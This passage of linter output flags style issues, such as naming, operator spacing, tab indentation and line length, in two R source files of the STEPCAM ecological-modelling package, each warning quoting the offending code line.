next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            